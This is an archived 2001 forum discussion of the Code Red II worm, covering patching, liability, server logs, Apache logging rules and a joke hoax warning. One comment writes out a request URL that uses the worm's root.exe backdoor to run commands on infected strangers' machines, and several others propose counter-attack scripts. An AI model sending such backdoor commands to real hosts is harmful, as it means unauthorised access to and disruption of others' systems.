[Sloppy]

Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

Re:Serious blow to open source & free software

[jmv]

Sorry, I didn't understand which program you were talking about... I agree with you now ;-)

Re:Serious blow to open source & free software

[jmv]

Even Linux updates don't get distributed this efficiently.

I don't know how efficient distribution of Linux updates is, but this is certainly not efficient. The different versions of Code Red have been there for more than a month and it doesn't seem to be about to stop. With the amount of publicity there is, you'd expect more people would patch their system. Again, I'm not saying Linux is better on update efficiency, although there seems to be fare less security holes.

Re:Serious blow to open source & free software

[Mike+Schiraldi]

I guess this is the Push Technology thing they made such a fuss about a few years ago.

Re:Serious blow to open source & free software

[ksheff]

They also make it sounds like IIS is the standard and that Apache is just an alternative. I guess they don't read Netcraft's reports. Just MS PR.

Back Door? Somebody call the Goatse.cx guy!

[Bonker]

leaves a wider ?back door'' on infected machines,

Code Red II left a copy of cmd.exe in IIS's 'scripts' directory, giving any and all comers who know the machine's IP address the ability to perform *any* system level command with nothing more than a web browser.

My question here is, how the hell do you have a 'wider' backdoor than that?!

Tech details are sparse. I haven't seen anything yet. Anyone have links to pages about the new variant's payload?

Re:Buffer overflow vulnerabilities

[TheMidget]

The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes! And yes, there are webservers coded entirely in Perl. For example, webmin's miniserv. And I'm sure, there are webservers entirely coded in Java too (tomcat?).

The thing is, with Perl and Java, the language's runtime handles memory allocation/de-allocation. And barring a bug in the language itself, there's no way an app written in such language can overflow a buffer. Either the buffer will be grown dynamically to fit the data, or the app will get an exception. But corruption of unrelated data cannot happen in this way.

Gives me an idea to stop it spreading so fast...

[chainsaw1]

I wonder if you can slow down the worm by stalling the worm's thread process. If you added a default.ida file that, essentially, took forever to return data/download (or at least caused a timeout while waiting to load a file), would the worm slow down?

Pros: We know the worm only creates 99 threads at a time. This could theoretically stop it spreading

Cons: Bandwith limit (stalled download) needs to be used to avoid DDOS-ing yourself.

Need to kill the connection to keep from memory busting the TCP stack or occupying all available TCP ports.

You'd basically be playing TCP firewall games based on a request on httpd for hitting a specific file in the website file tree. Scripting that may be difficult or impossible.

Anyone have any other thoughts?

Re:Linux to the rescue?

[Syberghost]

The bottom line regarding legality isn't what clever logical constructs we can formulate on /.

The bottom line is what 12 people too stupid to get out of jury duty are going to think, and the average person would think that making use of a hole in order to run code on somebody else's machine without their permission is an intrusion, and thus illegal.

Your life isn't in danger from the attack on your system, so you have a "duty to retreat" that compels you to shut down your system if necessary, not counterattack.

I don't agree with it, but there won't be 12 of me on your jury.

I saw that Reuters story earlier

[GC]

but I have not seen any instances of attempted infection.

It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

make some money off banner ads

[SethJohnson]

Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).

Re:Copycats

[billh]

How in the hell did this get moderated up? This thing is active, and will remain active, until EVERY IIS server has been patched. Whether or not the patch even works correctly remains to be seen.

We'll be seeing this thing for months.

From one of my servers:

Report generated on August 10, 2001 at 03:08
59 Code Red
525 Code Red II
584 Total attacks.

Report generated on August 09, 2001 at 03:08
76 Code Red
613 Code Red II
689 Total attacks.

Report generated on August 08, 2001 at 03:08
107 Code Red
578 Code Red II
685 Total attacks.

Report generated on August 07, 2001 at 03:08
124 Code Red
419 Code Red II
543 Total attacks.

Deredoc

[RobertGraham]

http://robertgraham.com/tools/deredoc

Source compiles on Windows and Linux, binaries available, works with libpcap, can respond back to a range of addressses.

BTW, this technique has been used since the early-1990s (i.e. I wrote a plugin for the ProTools sniffer that did something like this).

Public Logfile - for *Educational* Purposes Only

[BigBlockMopar]

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?

Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

Re:Microsoft should be sued

[Dr+Caleb]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project... [*snip*]... To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected Let's look at that shall we...

2 patches, ~500k for both. 1 for NT4, one for W2k.
[20 million 'registered' users] * [8.5 million "gates.bill@microsoft.com" entries] * [2 million bad addresses bouncing both attachments back]= The biggest DOS spam attack in history!

Exercise for the student: Multiply that by $0,59 for every bit/s it spends in Georgia...give 3 examples.

CodeRed Information

[SpunOne]

CodeRed - There were two versions of the original CodeRed worm, both of which were strictly memory resident and fairly tame, all things considered. Both of these will show NNNN's in your log files. You can find more information here.

CodeRed 2 - This is the worm we're seeing now, the one with the XXXX's in your logs. This worm seems to most frequently scan in it's own IP range (Class A I think?) So, if you're in the 24/8 range, you'll probably see a lot of scans from people using various cable providers. You can find more information about CodeRed 2 here.

So far, I haven't seen anything on the security sites confirming a 3rd version of this worm. The media has often used the term CodeRed3 to describe what is actually CodeRed2, the one giving us grief right now.

If a new variant of this worm does make it into the wild, it'll be interesting to see how quickly it can spread. It seems that a lot of hosts infected with CR2 give the error (403.9 Too many users connected) when you try to access port 80, which causes the eeye scanner to miss them, and apparently keeps them from being exploited by a new worm. It also keeps people from getting to the /scripts/root.exe that CR2 leaves behind as a backdoor. I'm not sure why IIS would give an error about too many users being connected when in reality, the number of CR hits are around 1-2 a minute. It's likely that the IIS process looks for the number of open sockets and then gives that message if there are too many sockets open. This would make sense since CR2 will open up ~300 connections in its attempt to spread.

It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me, since the patch should have fixed a buffer overflow in idq.dll. If that overflow was fixed and IIS is still crashing, perhaps there is another buffer overflow that's showing up when it gets the long string from CR2 as part of the redirection. Just a guess on my part though.

Re:Microsoft should be sued

[blang]

The average Joe Schmoe is not living in a trailer park. There are tons of middle managers, and others making a decent amount, who would think nothing of paying $100's extra for software, for the same reason that they'd get a Lexus or Mercedes. Of course they need Win2k.

Wow

[truthsearch]

I had to read your post twice, but are you saying that people are installing Win2K and NT with the IIS service automatically running and they haven't noticed??? Wow. The reason I'm surprised is that 2k and NT are usually used by people who are at least a little tech savvy. They're not standard home OSes. I guess I shouldn't be too surprised, but it sure doesn't take a server admin to see the little IIS icon next to your clock with a green arrow showing it's running. Move the mouse over it and it says "IIS - Running". That's pure incompetance on the user's part (and bad design on the OS install to have it run auto by default).

Morality of Counter Measures?

[Maul]

I have a bunch of IPs from my apache logs of attempted attacks on my box. Since I'm running a Linux box, I'm not getting infected, but I was thinking about putting a script on my error page that would SHUT DOWN (not reformat the HD) a compromised box (since the command line is fully available on a compromised machine). I know that this has been suggested...

My only question is if such a counter measure is moral / legal. Unlike the proposed counter measure worm, this wouldn't propogate. It'd only affect boxes infected with Code Red II. I'm not sure that messing around with the machine of another user, despite my intentions or the infected state of a box, is legal.

Re:Python has no buffer overflow problems.

[Russ+Nelson]

Nahhahhh. Dan Bernstein uses a different C library in his programs like qmail and djbdns and manages to avoid shooting himself in the root.
-russ

How about this:

[wirefarm]

Don't patch if it will break other server stuff.
Turn off IIS.
Install Apache to your Windows box.
Problem solved.
If you can't do that, just turn off IIS, we don't need your content that much.

Cheers,
Jim in Tokyo

Not Legal : Patent Problem

[Rashkae]

If you did that, you would run afoul McAffee's Patent on Web based virus removal and system administration.

Call in the BSA!

[wirefarm]

I came to the same conclusion that you did - I'm getting hit by home users - ATT.co.jp in my case.
People with the same dialup connection that I have.
Where do home users typically get their copy of Win2K or NT Server? Yup, that's right, they 'borrow' it from work.
So start telling people the 'truth' - That Code Red is actually the BSA's way of routing out unlicenced Windows installs...
;-)
Pity that the 'default page' on IIS doesn't list the 'Registered User' on it. That would get people turning off unused servers.

Funny thing is that I had just written the firewall explanation page below as it became very timely - I now get more hits for that than from Code Red.

Cheers,
Jim in Tokyo

Re:Please

[Black+Parrot]

> If Microsoft can't even patch their own servers then how can anyone expect others to do it properly?

The Register is reporting that the worm is now ravaging Micorsoft's internal network, because some foo brought in an infected laptop and plugged it in behind the firewall.

Shutting off IIS on an comprimised box...

[Xibby]

All it should take is sending a request like this: http://infected.host/scripts/root.exe?/c+start%%20 net%20stop%20ServiceName+c:\\

Figure out what the service name for IIS is and you can make it do a clean belly flop. No real damage done.

A full list of the exact services is found in the registry (run regedit.exe) under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es key.

Other things you could stop are Server and Workstation, and Maybe Simple TCP/IP Services. There is plenty you can do to a NT box with just the command line. And it starts getting really fun after you install the NT resource kit.

I know more than I ever wanted to know about NT...

Re:Better Names

[epfreed]

How about "Code Red III: Attack of the Clones?"

Thanks for the suggestion

[WillSeattle]

I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

OK, it will be ready in an hour, just got to build the array handler routine.

Re:Please

[truthsearch]

If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has less vulnerabilities.

Re:Buffer overflow vulnerabilities

[unitron]

But think of the great uptime stat you've got going!

Microsoft should be sued

[Rosco+P.+Coltrane]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

(of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

Re:Microsoft should be sued

[IronChef]

you have it backwards. The tide is the industry. The consumers are in the castle.

Re:Microsoft should be sued

[mpe]

Because we're not talking about admins, but gullible users.

Quite often with Windows the expectation is that "users" and "admins" are one and the same though...

Re:Microsoft should be sued

[Keith+Russell]

...most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software.

IIS doesn't even run on 9x, ME, or other spawn of 3.x. 2000 Professional* does not install IIS by default. Your Joe Schmoe must have either installed IIS after installing W2kPro, or installed W2k Server, which does install IIS automatically. Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.

*: This also applies to NT 4.0.

Re:Microsoft should be sued

[blang]

Because we're not talking about admins, but gullible users. When I did a quick toor to the hacked sites in my apache log, most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software. Nobody ever told them that the software is considered harmful, and needs constant babysitting. Sounds like a good enough reason for a class action law suite to me.

Re:Microsoft should be sued

[cr0sh]

I can't count the number of times when patches have been applied to NT-based servers, only to have other server software (generally third-party) die after the patch is put into place.

Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:

1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.

Suddenly, it all makes sense...

Re:Microsoft should be sued

[garcia]

yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.

it is both MS's responsibility and the user's. I agree that the user should know what the hell he is doing, but MS should not have *ANY* service installed by default w/o telling the end user (especially when targeting the market they are).

Re:Microsoft should be sued

[blang]

Printing it in a license does not excempt them from state and federal laws, not to speak about other countries.

If reckless conduc atnd damages are proved, the little print in the license is not worth piffle.

Finally

[nEoN+nOoDlE]

Sequels that are actually better than the original.

Guess I'll have to avoid synagogues.

[Ungrounded+Lightning]

I've been reading your sig for a while now. I think the sig from Deuteronimy(sp?) might apply to you.

Guess I'll have to avoid synagogues.

But I thought Deuteronimy was a sin whose commission involved Hydrogen 2. Setting off fusion bombs, maybe?

More info?

[Mike+Hicks]

Anyone have more info? How it looks in logs, etc.?

If the log hits aren't for you, do the right thing

[Darby]

and see that they go where they belong. I mean seriously, I've seen lot's of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the affect of: If you're looking for such and such they're actually located here.
It's just common courtesy provided it isn't a competitors site.

So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

Re:Please

[tb3]

It's worse than that. Not only did it infect Hotmail servers, but servers on Microsoft's internal network.

Code Red 'counter'

[Delphis]

I'm not too worried about the IP address, although I am interested to know how many times an infection attempt has been tried (amusing when you're using apache 1.3.20). The simple command:

cat /var/log/httpd/*/access_log.099* | grep default.ida | wc -l

acts like a simple 'counter', if you have your logs for different sites split up and using rotatelogs like I do.

Just an obvious question or two...

[glebite]

Has anybody in this forum had a machine in their universe infected by the Code Red worm? (any variant) You can reply as AC if you wish...

Secondly, when Code Red was on your machine, was net access notably slower? Basic machine performance slower?

I'm just curious as I would figure that an infected machine with several threads of code running would slow my machine down to the point that even if I had no knowledge if IIS were on my machine, I would at least notice a difference...

I personally think hearing of people's experiences, getting some message out to the press might help. (ie - cable modem and other users running Windows NT or 2000 might have noticed a performance degradation - check for this patch to download) (as if the press coverage wasn't enough to warn people...

More info on Code Red III

[Sideways+The+Dog]

WARNING, VIRUS ALERT!!!

If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code,screw up the tracking on your VCR and use subspace fieldharmonic to scratch any CDs you try to play.

It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer.It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

K5 contest

That contest is already running on Kuro5hin. The big "problem" is that many systems don't run IIS with Administrator priv, so the backdoor is limited in how much repair it can do.

I just have my web server do a "net send %DOMAIN%" to warn them about their problem.

Re:Copycats

[Syberghost]

Would you mind suggesting it to them?

Yeah, us folks on the Unix side of the operation have been snickering at the NT guys the whole time.

Unfortunately, some of our stuff requires some of theirs to be there in order to push the data around.

How can you get a BIGGER back door than CRII?

[Enigma2175]

from the article:
leaves a wider "back door" on infected machines, making them more vulnerable to future hacking.

I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

Its called personal web server

[gad_zuki!]

IIS doesn't even run on 9x, ME, or other spawn of 3.x

Actually you can run a mini version of IIS that could be suspectible to code red on a 95 or 98 machine. The personal webserver from MS is advertised as only working on NT but it'll run on 95 or 98. I haven't tested it 95 though.

I've gotten default.ida hits from PSW so I know its suspectible to at least one kind of code red.

Re:Code Red (I,II,III) Fix for Apache webservers

[CM39]

I tried redirecting it and it didn't work. :-)

Re:Gives me an idea to stop it spreading so fast..

[srw]

It's been done. It's been on slashdot.

http://slashdot.org/article.pl?sid=01/08/04/1413 21 1&mode=thread


Look for "codeRedNeck"

So does the GPL

[roju]

Have you ever read the GPL?

It specifically disclaims any and all liabilities and warranties.

If the Microsoft EULA disclaiming responsibility is invalid, isn't the GPLs? If you argue that GPLed software is free, so consumer protection laws don't apply, then what if you paid Red Hat $15 for their distribution?

Regardless of whether you paid them for the packaging or the 1-800 support number, you bought something from 'em, so shouldn't they be liable if your linux box ruins your MySQL database?

Re:Copycats

[Syberghost]

And why the hell weren't they working on it when the advisory first came out in June? They aren't doing their job if it takes an infection of this scale to make them patch this hole. And let's face it, if it took them one and a half months to get around to patching this one hole, how many others have they left unpatched? See ya around when the next worm hits. I don't have one bit of sympathy for these people, the bottom line is they weren't doing their job.


I completely agree. And yet, despite the fact that I was doing my job, this still left me dead in the water.

And some of them were working on it when they got the advisory, but couldn't fix it yet because their third-party software doesn't work with Service Pack 6 installed, so they can't install the patch. They were working with the vendors to get the software updated, or working to find or code a replacement, trusting that the NT admins with customer-facing IIS servers would patch.

Some of those folks were overridden by PHBs.

While this was going on, I was being told I couldn't install a Sun FTP patch "until it was tested via the normal process", which added about a week of time in which I was subject to a known vulnerability, but couldn't do dick about it.

Ironically, we installed it Thursday.

I had it ready to go five minutes after the advisory was released, but couldn't install it for a week, because of management. The NT folks go through similar problems.

Put it in another log and forget about it.

[Malc]

"I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

I'm not even sure how to spell regexe, but this is what I've attempted to do:

SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
CustomLog /var/log/apache/code-red-request.log common env=code-red-request
#CustomLog /var/log/apache/access.log common
CustomLog /var/log/apache/access.log common env=!code-red-request

RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1

Interesting Irony

[Naerbnic]

So, Three Code Reds and a SirCam later, the question just begs to be asked:

Who's calling Whose code "Potentially Viral"?

Worthy

[fobbman]

Now this is a sequal worthy of the name The Clone Wars.

I think you're on to something...

[Nate+Fox]

According to Symantec's page on CR2:

Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C